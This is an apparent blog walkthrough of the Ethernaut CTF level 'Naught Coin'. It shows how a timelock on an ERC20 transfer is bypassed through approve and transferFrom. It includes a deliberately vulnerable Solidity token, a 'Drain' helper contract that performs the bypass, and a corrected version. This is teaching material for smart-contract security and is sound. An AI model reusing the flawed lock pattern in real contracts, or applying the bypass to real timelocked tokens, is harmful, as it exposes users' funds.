Ethernaut Level 15 Walkthrough: Naught Coin

Ethernaut Level 15, “Naught Coin,” throws you headfirst into the world of ERC20 tokens and their potential vulnerabilities. The level hands you an ERC20 token whose entire supply has been minted to your address, together with a 10-year lock that stops you from calling transfer. But fear not, intrepid hacker (for educational purposes only!), there’s a way to bypass this lock. Here’s a walkthrough on how to conquer Level 15 and the key takeaways you’ll gain.

Understanding the Challenge:

Upon entering Ethernaut Level 15, you’ll be presented with a deployed Naught Coin contract. This contract inherits the standard ERC20 functionality from the OpenZeppelin implementation, so you can view your token balance, but its overridden transfer function is guarded by a timelock that rejects any transfer from the player for 10 years. The objective? Find a way around the lock and move your tokens to another address so that your balance drops to 0.

[Image: Solidity code and console output used to solve the Naught Coin challenge]

The Exploit: Abusing Approvals

The key to cracking the Naught Coin vault lies in understanding the approve function within the ERC20 standard. This function allows users to grant permission to another address (called a spender) to transfer a specific amount of tokens on their behalf.

The vulnerability in this challenge stems from where the timelock is enforced. Naught Coin overrides transfer and attaches its timelock modifier (lockTokens) only there, while approve and transferFrom are inherited from the OpenZeppelin ERC20 implementation unchanged, and transferFrom never calls the overridden transfer. Any holder can therefore approve a spender and have that spender move the balance with transferFrom without the lock ever being consulted.

The Walkthrough:

  1. Check your balance: in the Ethernaut console, note your player address and look up your starting balance in the Naught Coin contract (the level page exposes player and contract as globals, and balanceOf is the standard ERC20 view for this).
  2. Copy the contract into Remix IDE and replace the import with this URL: https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/token/ERC20/ERC20.sol
  3. Compile the code and go to the deploy section, making sure to select Injected Provider – MetaMask as the environment. Then paste the instance address into the “At address” field. This attaches Remix to the already deployed instance rather than deploying a new contract.
  4. Call the player function to confirm it matches your address, and call balanceOf with your address to check the balance again.
  5. Approve your own address: here comes the clever part. Use the approve function to grant your own address an allowance equal to your entire token balance. In essence, you’re approving yourself to move your own tokens.
  6. Transfer using transferFrom: now, here’s the twist. Instead of using the transfer function (which is locked), call the transferFrom function. It allows an approved spender (your address in this case) to transfer tokens on behalf of the owner (also your address). Pick any other address as the “to” parameter (an address found on Etherscan or a second account of your own both work) and transfer the full balance there.
  7. Check your balance; it should now be 0.
  8. Finally, submit the instance. Congratulations, you passed this level.

By using transferFrom with your own address as both the spender and the owner, you bypass the timelock and move your entire token balance to another address. Your balance in the contract then reads 0, which is exactly what the level checks, so the player’s holding is effectively “drained”.
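The following is an added example and is neither the level’s source nor Metana’s code: a minimal reconstruction of the Naught Coin pattern (the contract names LockedCoin and Drain, the symbol and the error strings are my own), plus a helper contract that performs the same approve-then-transferFrom sequence the walkthrough does by hand from the console. It assumes OpenZeppelin Contracts v5 is installed under the @openzeppelin/contracts import path.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Assumption: OpenZeppelin Contracts v5 installed under @openzeppelin/contracts.
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import "@openzeppelin/contracts/token/ERC20/IERC20.sol";

// Reconstruction of the Naught Coin pattern (not the level's exact source).
// The timelock guards only the overridden transfer(); approve() and
// transferFrom() are inherited from ERC20 unchanged.
contract LockedCoin is ERC20 {
    uint256 public timeLock = block.timestamp + 10 * 365 days;
    address public player;

    constructor(address _player) ERC20("LockedCoin", "LCK") {
        player = _player;
        _mint(_player, 1_000_000 * 10 ** uint256(decimals()));
    }

    // The guard keys on msg.sender and is attached only to transfer().
    modifier lockTokens() {
        if (msg.sender == player) {
            require(block.timestamp > timeLock, "tokens are locked");
        }
        _;
    }

    function transfer(address to, uint256 value) public override lockTokens returns (bool) {
        return super.transfer(to, value);
    }
}

// Helper that moves the caller's whole balance through the unguarded
// transferFrom path. The player first calls coin.approve(address(drain), balance),
// just as the walkthrough approves its own address, then calls drain(coin, to).
contract Drain {
    function drain(IERC20 coin, address to) external returns (uint256 moved) {
        moved = coin.balanceOf(msg.sender);
        require(coin.allowance(msg.sender, address(this)) >= moved, "approve the helper first");
        // Inside the token, msg.sender is this contract rather than the player,
        // and transferFrom carries no lock anyway, so the timelock is never checked.
        require(coin.transferFrom(msg.sender, to, moved), "transferFrom failed");
    }
}
```

Approving your own address and calling transferFrom yourself, as the walkthrough does, is the same two calls with the spender equal to the owner; the helper contract variant just makes it obvious that the lock is tied to a function, not to the tokens.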

Conclusion:

By exploiting the mismatch between the locked transfer function and the unrestricted approve/transferFrom path, you’ve successfully bypassed the timelock and moved your tokens in the Ethernaut Level 15 challenge. This walkthrough highlights the importance of careful contract design and security audits within the DeFi space. Approaching unfamiliar tokens, especially those with custom logic or odd functionalities, requires extra caution.

FAQs:

Is this a vulnerability in all ERC20 tokens?

  • No, not necessarily. This exploit relies on a specific design flaw in the Naught Coin contract: the lock guards transfer but not the approve/transferFrom path. A correctly written restriction hooks the one internal function every balance change passes through (in OpenZeppelin’s ERC20 that is _update in v5, or _beforeTokenTransfer in v4) and checks the from address rather than msg.sender, so an approved spender is blocked as well.
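As an added example of what a correct lock looks like (my code, not the level’s or OpenZeppelin’s; the contract name LockedCoinFixed, symbol and error string are assumptions), here is the same token with the check moved into _update. It assumes OpenZeppelin Contracts v5 under the @openzeppelin/contracts import path.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Assumption: OpenZeppelin Contracts v5 installed under @openzeppelin/contracts.
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";

// Hardened form of the lock (added example, not the level's code). In OpenZeppelin
// v5 every balance change (transfer, transferFrom, _mint, _burn) routes through
// _update, so hooking it covers the allowance path too. The check keys on `from`
// rather than msg.sender, so an approved spender cannot move the locked balance.
// OpenZeppelin v4 exposes the equivalent hook as _beforeTokenTransfer(from, to, amount).
contract LockedCoinFixed is ERC20 {
    uint256 public immutable timeLock;
    address public immutable player;

    constructor(address _player) ERC20("LockedCoinFixed", "LCKF") {
        player = _player;
        timeLock = block.timestamp + 10 * 365 days;
        // Minting has from == address(0), so the lock does not block the initial supply.
        _mint(_player, 1_000_000 * 10 ** uint256(decimals()));
    }

    function _update(address from, address to, uint256 value) internal override {
        if (from == player) {
            require(block.timestamp > timeLock, "tokens are locked");
        }
        super._update(from, to, value);
    }
}
```

With this version, approve still succeeds (it only records an allowance), but any transferFrom that names the player as from reverts until the lock expires.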

What are the takeaways from this challenge?

  • This challenge emphasizes the importance of understanding ERC20 token standards and potential vulnerabilities associated with approvals. It also highlights the need for thorough contract audits before deployment in DeFi.

Can I get my tokens back after draining them?

  • Unfortunately, no. Once transferFrom executes, the tokens belong to the recipient address, and unless you control that address there is no way to get them back. This is why it’s crucial to try such exploits only on the Ethernaut instance and never on real contracts holding your funds.

Are there other ways to solve this challenge?

  • The approve and transferFrom approach is the standard solution. Variants that route the transferFrom call through a different spender (for example a helper contract you approve) rely on the same flaw, since the lock is only ever checked inside transfer.

What’s next on my Ethernaut journey?

  • Ethernaut offers a variety of challenges with increasing difficulty. Keep exploring to learn more about smart contract vulnerabilities and how to write secure code for the blockchain!
